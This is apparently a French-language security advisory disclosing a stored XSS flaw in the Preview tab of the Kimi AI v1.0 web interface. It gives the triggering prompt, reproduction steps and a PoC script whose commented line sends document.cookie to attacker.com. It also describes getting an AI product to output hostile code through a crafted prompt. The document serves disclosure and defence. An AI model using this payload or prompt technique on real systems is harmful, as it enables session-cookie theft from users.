
Divulgation détaillée d'une vulnérabilité XSS stockée dans l'onglet Preview de Kimi AI v1.0, incluant le scénario d'attaque, le PoC et des recommandations de remédiation pour les chercheurs en sécurité.
Une vulnérabilité de type Cross-Site Scripting (XSS) existe dans la fonctionnalité « Preview » de l'interface web Kimi AI v1.0. L'application ne parvient pas à nettoyer ou encoder correctement les charges utiles HTML/JavaScript générées par le modèle d'IA. Lorsqu'un utilisateur bascule vers l'onglet « Preview » pour visualiser le code généré par l'IA, la charge utile malveillante est rendue directement dans le DOM, entraînant l'exécution de JavaScript arbitraire dans la session du navigateur de la victime.
Mustafa Hameed
La vulnérabilité peut être exploitée en demandant à l'IA de générer un outil de sécurité ou un script (par exemple, un scanner XSS automatisé similaire à XSStrike) contenant des charges utiles intégrées. L'IA génère le code source de l'application demandée mais intègre la charge utile malveillante dans le framework HTML/JavaScript. Lorsque la victime accède à l'onglet « Preview » pour tester ou visualiser l'outil généré, la charge utile malveillante intégrée contourne l'assainissement et s'exécute immédiatement.
"Créez un simple outil de scanner XSS basé sur le web, similaire à XSStrike. Incluez une interface avec une liste de charges utiles pour l'analyse."
<script>
alert('mustafa');
// Potential for malicious action: fetch('http://attacker.com/log?cookie=' + document.cookie)
</script>
1.Connectez-vous à la plateforme web Kimi AI.
2.Fournissez l'invite demandant la création d'un outil (comme le clone de XSStrike) contenant le code du scanner.
3.Attendez que le modèle d'IA génère entièrement la réponse en code.
4.Cliquez sur l'onglet « Preview » dans l'interface de chat pour afficher l'application rendue.
5.L'application ne parvient pas à filtrer le contexte JavaScript dans le conteneur d'aperçu, ce qui déclenche l'exécution immédiate du script dans le navigateur de la victime.
Vous trouverez ci-dessous la capture d'écran démontrant l'exécution réussie de la charge utile XSS. Le JavaScript malveillant se déclenche immédiatement lors de l'accès à l'onglet 'Preview' :
